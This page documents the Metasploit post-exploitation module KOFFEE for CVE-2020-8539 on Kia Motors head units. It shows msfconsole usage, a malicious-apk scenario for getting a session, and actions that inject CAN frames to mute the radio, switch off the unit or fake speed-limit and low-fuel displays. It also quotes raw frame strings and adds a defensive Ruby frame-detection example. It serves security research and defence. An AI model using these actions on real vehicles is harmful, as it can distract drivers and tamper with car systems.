KOFFEE - Kia OFFensivE Exploit - Metasploit
This page contains detailed information about how to use the post/android/local/koffee metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: KOFFEE - Kia OFFensivE Exploit
Module: post/android/local/koffee
Source code: modules/post/android/local/koffee.rb
Disclosure date: 2020-12-02
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): Android
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2020-8539
This module exploits CVE-2020-8539, an arbitrary code execution vulnerability that allows an attacker to execute the micomd binary on the head unit of Kia Motors vehicles. This module has been tested on the SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software versions. Run on an active session, it allows an attacker to send crafted micomd commands that control the head unit and send CAN bus frames into the Multimedia CAN (M-CAN) of the vehicle.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/android/local/koffee
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/android/local/koffee
msf post(koffee) > show options
... show and set options ...
msf post(koffee) > set SESSION session-id
msf post(koffee) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/android/local/koffee")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
KOFFEE exploits CVE-2020-8539, an arbitrary code execution vulnerability that allows a user to execute the micomd binary with valid payloads on Kia Motors head units. Using KOFFEE, an attacker can send crafted micomd commands to control the head unit and send CAN bus frames into the Multimedia CAN (M-CAN) of the vehicle.
Vulnerable Head Unit software versions
- SOP.003.30.180703
- SOP.005.7.181019
- SOP.007.1.191209
Verification Steps
- [ ] Start msfconsole
- [ ] use post/android/local/koffee
- [ ] set session 1
- [ ] toggle_radio_mute or run
What do you need
- An active session with the Head Unit
Options
- MICOMD: The path to the micomd executable.
- NUM_MSG: The number of MICOM commands sent each time.
- PERIOD: The time (ms) interval between two MICOM commands, i.e. the period of the CAN frames.
- SESSION: The Metasploit session number on which this module is run.
- CMD_PAYLOAD: The Micom payload to be injected, e.g. 'cmd byte1 byte3 byte2'. By default it is set to 00 00 00. This option is only used by the INJECT_CUSTOM action.
Actions
The following actions can be triggered on the Head Unit. An action is triggered by typing its name in lowercase at the Metasploit console, e.g. camera_reverse_off.
- CAMERA_REVERSE_OFF: It hides the parking camera video stream
- CAMERA_REVERSE_ON: It shows the parking camera video stream
- CLUSTER_CHANGE_LANGUAGE: It changes the cluster language
- CLUSTER_RADIO_INFO: It shows radio info in the instrument cluster
- CLUSTER_RANDOM_NAVIGATION: It shows navigation signals in the instrument cluster
- CLUSTER_ROUNDABOUT_FARAWAY: It shows a roundabout signal with variable distance in the instrument cluster
- CLUSTER_SPEED_LIMIT: It changes the speed limit shown in the instrument cluster
- HIGH_SCREEN_BRIGHTNESS: It increases the head unit screen brightness
- INJECT_CUSTOM: It injects custom micom payloads
- LOW_FUEL_WARNING: It pops up a low fuel message on the head unit
- LOW_SCREEN_BRIGHTNESS: It decreases the head unit screen brightness
- MAX_RADIO_VOLUME: It sets the radio volume to the max
- NAVIGATION_FULL_SCREEN: It pops up the navigation app
- REDUCE_RADIO_VOLUME: It reduces radio volume
- SEEK_DOWN_SEARCH: It triggers the seek down radio frequency search
- SEEK_UP_SEARCH: It triggers the seek up radio frequency search
- SET_NAVIGATION_ADDRESS: It pops up the navigation address window
- SWITCH_OFF_HU: It switches off the head unit
- SWITCH_ON_HU: It switches on the head unit
- TOGGLE_RADIO_MUTE: It mutes/unmutes the radio
An action can be also triggered using the commands:
- [ ] set action CAMERA_REVERSE_ON
- [ ] run
To execute the INJECT_CUSTOM action, you may also want to set the right payload. The commands to trigger this action are:
- [ ] set action INJECT_CUSTOM
- [ ] set CMD_PAYLOAD 01 FF
- [ ] run
Scenarios
KOFFEE can be run as a post-exploitation module when an active session is available with the Head Unit (HU). First, an attacker may create a malicious apk to obtain a remote connection with the HU. For instance, using msfvenom or other tools, an attacker can create a malicious apk that, once installed on the HU, starts an active session. The attacker is then able to use the KOFFEE module to take control of the HU and inject CAN bus frames into the M-CAN bus of the vehicle.
Usage
msf6 > use post/android/local/koffee
msf6 post(android/local/koffee) > set session 1
session => 1
msf6 post(android/local/koffee) > toggle_radio_mute
[*] -- Starting action --
[*] -- Mute/umute radio --
[+] -- Command Sent --
Msfconsole Usage
Here is how the android/local/koffee post exploitation module looks in the msfconsole:
msf6 > use post/android/local/koffee
msf6 post(android/local/koffee) > show info
Name: KOFFEE - Kia OFFensivE Exploit
Module: post/android/local/koffee
Platform: Android
Arch:
Rank: Normal
Disclosed: 2020-12-02
Provided by:
Gianpiero Costantino
Ilaria Matteucci
Compatible session types:
Meterpreter
Available actions:
Name Description
---- -----------
CAMERA_REVERSE_OFF It hides the parking camera video stream
CAMERA_REVERSE_ON It shows the parking camera video stream
CLUSTER_CHANGE_LANGUAGE It changes the cluster language
CLUSTER_RADIO_INFO It shows radio info in the instrument cluster
CLUSTER_RANDOM_NAVIGATION It shows navigation signals in the instrument cluster
CLUSTER_ROUNDABOUT_FARAWAY It shows a round about signal with variable distance in the instrument cluster
CLUSTER_SPEED_LIMIT It changes the speed limit shown in the instrument cluster
HIGH_SCREEN_BRIGHTNESS It increases the head unit screen brightness
INJECT_CUSTOM It injects custom micom payloads
LOW_FUEL_WARNING It pops up a low fuel message on the head unit
LOW_SCREEN_BRIGHTNESS It decreases the head unit screen brightness
MAX_RADIO_VOLUME It sets the radio volume to the max
NAVIGATION_FULL_SCREEN It pops up the navigation app window
REDUCE_RADIO_VOLUME It decreases the radio volume
SEEK_DOWN_SEARCH It triggers the seek down radio frequency search
SEEK_UP_SEARCH It triggers the seek up radio frequency search
SET_NAVIGATION_ADDRESS It pops up the navigation address window
SWITCH_OFF_HU It switches off the head unit
SWITCH_ON_HU It switches on the head unit
TOGGLE_RADIO_MUTE It mutes/umutes the radio
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
MICOMD /system/bin/micomd yes Path to micomd executable
NUM_MSG 5 yes Number of MICOM commands sent each time
PERIOD 0.200 yes Time (ms) interval between two MICOM commands, aka Period of CAN frames
SESSION yes The session to run this module on.
Description:
This module exploits CVE-2020-8539, which is an arbitrary code
execution vulnerability that allows an to attacker execute the
micomd binary file on the head unit of Kia Motors. This module has
been tested on SOP.003.30.18.0703, SOP.005.7.181019 and
SOP.007.1.191209 head unit software versions. This module, run on an
active session, allows an attacker to send crafted micomd commands
that allow the attacker to control the head unit and send CAN bus
frames into the Multimedia CAN (M-Can) of the vehicle.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-8539
https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf
Module Options
This is a complete list of options available in the android/local/koffee post exploitation module:
msf6 post(android/local/koffee) > show options
Module options (post/android/local/koffee):
Name Current Setting Required Description
---- --------------- -------- -----------
MICOMD /system/bin/micomd yes Path to micomd executable
NUM_MSG 5 yes Number of MICOM commands sent each time
PERIOD 0.200 yes Time (ms) interval between two MICOM commands, aka Period of CAN frames
SESSION yes The session to run this module on.
Post action:
Name Description
---- -----------
TOGGLE_RADIO_MUTE It mutes/umutes the radio
Advanced Options
Here is a complete list of advanced options supported by the android/local/koffee post exploitation module:
msf6 post(android/local/koffee) > show advanced
Module advanced options (post/android/local/koffee):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the android/local/koffee module can do:
msf6 post(android/local/koffee) > show actions
Post actions:
Name Description
---- -----------
CAMERA_REVERSE_OFF It hides the parking camera video stream
CAMERA_REVERSE_ON It shows the parking camera video stream
CLUSTER_CHANGE_LANGUAGE It changes the cluster language
CLUSTER_RADIO_INFO It shows radio info in the instrument cluster
CLUSTER_RANDOM_NAVIGATION It shows navigation signals in the instrument cluster
CLUSTER_ROUNDABOUT_FARAWAY It shows a round about signal with variable distance in the instrument cluster
CLUSTER_SPEED_LIMIT It changes the speed limit shown in the instrument cluster
HIGH_SCREEN_BRIGHTNESS It increases the head unit screen brightness
INJECT_CUSTOM It injects custom micom payloads
LOW_FUEL_WARNING It pops up a low fuel message on the head unit
LOW_SCREEN_BRIGHTNESS It decreases the head unit screen brightness
MAX_RADIO_VOLUME It sets the radio volume to the max
NAVIGATION_FULL_SCREEN It pops up the navigation app window
REDUCE_RADIO_VOLUME It decreases the radio volume
SEEK_DOWN_SEARCH It triggers the seek down radio frequency search
SEEK_UP_SEARCH It triggers the seek up radio frequency search
SET_NAVIGATION_ADDRESS It pops up the navigation address window
SWITCH_OFF_HU It switches off the head unit
SWITCH_ON_HU It switches on the head unit
TOGGLE_RADIO_MUTE It mutes/umutes the radio
Evasion Options
Here is the full list of possible evasion options supported by the android/local/koffee post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(android/local/koffee) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
The <NAME> option is required by the <ACTION.NAME> action.
Here is a relevant code snippet related to the "The <NAME> option is required by the <ACTION.NAME> action." error message:
104: # all conditional options are required when active, make sure none of them are blank
105: options.each_pair do |name, option|
106: next if option.conditions.empty?
107: next unless Msf::OptCondition.show_option(self, option)
108:
109: fail_with(Failure::BadConfig, "The #{name} option is required by the #{action.name} action.") if datastore[name].blank?
110: end
111: print_status(' -- Starting action -- ')
112: send("action_#{action.name.downcase}")
113: end
114:
No distance
Here is a relevant code snippet related to the "No distance" error message:
212: send_out_custom('4D1 66 00 00 00 14 86 20 00')
213: print_status(' -- ft -- ')
214: send_out_custom('4D1 66 00 00 00 14 86 30 00')
215: print_status(' -- yd -- ')
216: send_out_custom('4D1 66 00 00 00 14 86 40 00')
217: print_status(' -- No distance -- ')
218: send_out_custom('4D1 66 00 00 00 14 86 50 00')
219: end
220:
221: def action_cluster_random_navigation
222: print_status(' -- Calculating the route -- ')
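As an added example, not code from the module or from this page: the frame strings the snippet above passes to send_out_custom ('4D1 66 00 00 00 14 86 50 00' and its siblings) parsed and validated as standard CAN frames, then used as a watchlist to flag matching frames in a candump-style M-CAN capture, which is the check a defender with bus logs would want. Reading the first token as an 11-bit CAN identifier and the rest as data bytes, the candump line format and the sample log lines are assumptions.

```ruby
# Added example, not part of the Metasploit module: parse the frame strings the
# module hands to send_out_custom (e.g. '4D1 66 00 00 00 14 86 50 00') and flag
# matching frames in a candump-style CAN log. Reading the first token as an
# 11-bit CAN identifier and the remaining tokens as data bytes is an assumption.
# "ID b0 b1 ... b7" -> { id: Integer, data: [Integer, ...] }, or nil if malformed.
def parse_micom_frame(str)
  tokens = str.strip.split(/\s+/)
  return nil if tokens.length < 2 || tokens.length > 9 # ID plus 1..8 data bytes
  return nil unless tokens[0] =~ /\A\h{1,3}\z/
  id = tokens[0].hex
  return nil if id > 0x7FF                              # standard CAN IDs are 11 bits
  return nil unless tokens[1..].all? { |t| t =~ /\A\h{2}\z/ }
  { id: id, data: tokens[1..].map(&:hex) }
end

# One candump log line, e.g. "(1609459200.300) can0 4D1#6600000014863000".
CANDUMP_RE = /\A\((?<ts>[\d.]+)\)\s+(?<iface>\S+)\s+(?<id>\h{3,8})#(?<data>\h*)\z/

def parse_candump_line(line)
  m = CANDUMP_RE.match(line.strip)
  return nil unless m
  { ts: m[:ts].to_f, iface: m[:iface], id: m[:id].hex, data: m[:data].scan(/\h\h/).map(&:hex) }
end

# Return the logged frames whose ID and first prefix_len data bytes match a
# watchlist entry. A prefix match lets one entry cover every variant of a
# command, e.g. the distance-unit byte the cluster snippet cycles through.
def flag_watchlisted(log_lines, watchlist, prefix_len: 2)
  log_lines.filter_map do |line|
    frame = parse_candump_line(line)
    next unless frame
    hit = watchlist.any? { |w| w[:id] == frame[:id] && w[:data].first(prefix_len) == frame[:data].first(prefix_len) }
    hit ? { ts: frame[:ts], id: frame[:id], data: frame[:data] } : nil
  end
end

# Constructed sample data: the watchlist entry is the frame quoted on this page, the log lines are made up.
WATCHLIST = ['4D1 66 00 00 00 14 86 50 00'].map { |s| parse_micom_frame(s) }
SAMPLE_LOG = [
  '(1609459200.100) can0 1F1#0000000000000000', # unrelated traffic
  '(1609459200.300) can0 4D1#6600000014863000', # same command, other unit byte
  '(1609459200.500) can0 4D1#AA00000000000000', # same ID, different command
  'not a candump line'                          # malformed, skipped
]

if __FILE__ == $PROGRAM_NAME
  flag_watchlisted(SAMPLE_LOG, WATCHLIST).each { |f| puts format('%.3f id=%03X data=%s', f[:ts], f[:id], f[:data].map { |b| format('%02X', b) }.join(' ')) }
end
```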
Related Pull Requests
- #15021 Merged Pull Request: KOFFEE first commit. This module exploits the Arbitrary Code Executio…
See Also
Check also the following modules related to this module:
- post/android/capture/screen
- post/android/gather/hashdump
- post/android/gather/sub_info
- post/android/gather/wireless_ap
- post/android/manage/remove_lock
- post/android/manage/remove_lock_root
Authors
- Gianpiero Costantino
- Ilaria Matteucci
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.